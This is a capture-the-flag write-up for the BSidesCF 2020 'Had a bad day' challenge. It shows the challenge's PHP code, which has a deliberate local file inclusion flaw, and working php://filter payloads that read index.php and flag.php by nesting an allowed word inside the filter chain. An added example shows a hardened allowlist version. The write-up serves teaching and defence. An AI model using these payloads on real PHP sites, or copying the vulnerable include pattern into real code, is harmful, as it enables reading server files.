[BSidesCF 2020] Had a bad day write-up
For this challenge, first use php://filter/convert.base64-encode/resource=index (the extension is left off in this challenge) to read the source of index.php:
<?php
$file = $_GET['category'];
if(isset($file))
{
    // Substring checks: the value only has to contain one of the words somewhere.
    // The third strpos() is not compared with false, so "index" at offset 0 does not pass.
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        // The user-controlled value goes straight into include(), with ".php" appended.
        include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
</div>
<form action="index.php" method="get" id="choice">
<center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
</form>
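strpos() finds the position of the first occurrence of a string; the return value is the number of characters that precede the string being searched for.
Clearly, the challenge requires the GET parameter to contain woofers, meowers, or index, and then performs a file include.
The key point is that the pseudo-protocol can nest protocols: /index.php?category=php://filter/convert.base64-encode/index/resource=flag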
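Key takeaways:
1. strpos() returns the number of characters that precede the string being searched for.
2. ?file=php://filter/convert.base64-encode/resource=flag.php In a file inclusion vulnerability, passing this parameter is equivalent to saying that the file to read is flag.php.
3. ?file=php://filter/convert.base64-encode/resource=flag.php Any characters can be added between /convert.base64-encode/ and /resource=flag.php without affecting the result. For example, this challenge requires the parameter to contain woofers, meowers, or index, so pass any one of the three there and you get the base64-encoded contents of flag.php.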
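The substring check from index.php next to a strict allowlist lookup, as an added example that is not part of the challenge or the original write-up. The names substring_check, resolve_category and CATEGORY_PAGES are hypothetical, and the sample inputs are constructed, apart from the request quoted above.

```php
<?php
// Added example, not the challenge's code. All function and constant names
// here are hypothetical.

// The check from index.php above: passes if a word appears anywhere.
function substring_check(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");   // offset 0 and false are both falsy
}

// Hardened form: the parameter is only a lookup key. The path that gets
// included always comes from this server-side table, never from the request.
const CATEGORY_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

function resolve_category($input): ?string
{
    if (!is_string($input)) {        // rejects category[]=... array input
        return null;
    }
    return CATEGORY_PAGES[$input] ?? null;   // exact match or nothing
}

// Constructed sample inputs; the third is the request from this write-up.
$samples = [
    'woofers',
    'index',
    'php://filter/convert.base64-encode/index/resource=flag',
    '../woofers',
];

foreach ($samples as $s) {
    $old  = substring_check($s) ? 'include' : 'reject';
    $page = resolve_category($s);
    $new  = $page !== null ? "include $page" : 'reject';
    printf("%-56s old=%-8s new=%s\n", $s, $old, $new);
}
// A real page would then run: include __DIR__ . '/' . $page;
// and only when $page !== null.
```

Because the included path never contains request data, neither a wrapper prefix nor a traversal sequence can reach include().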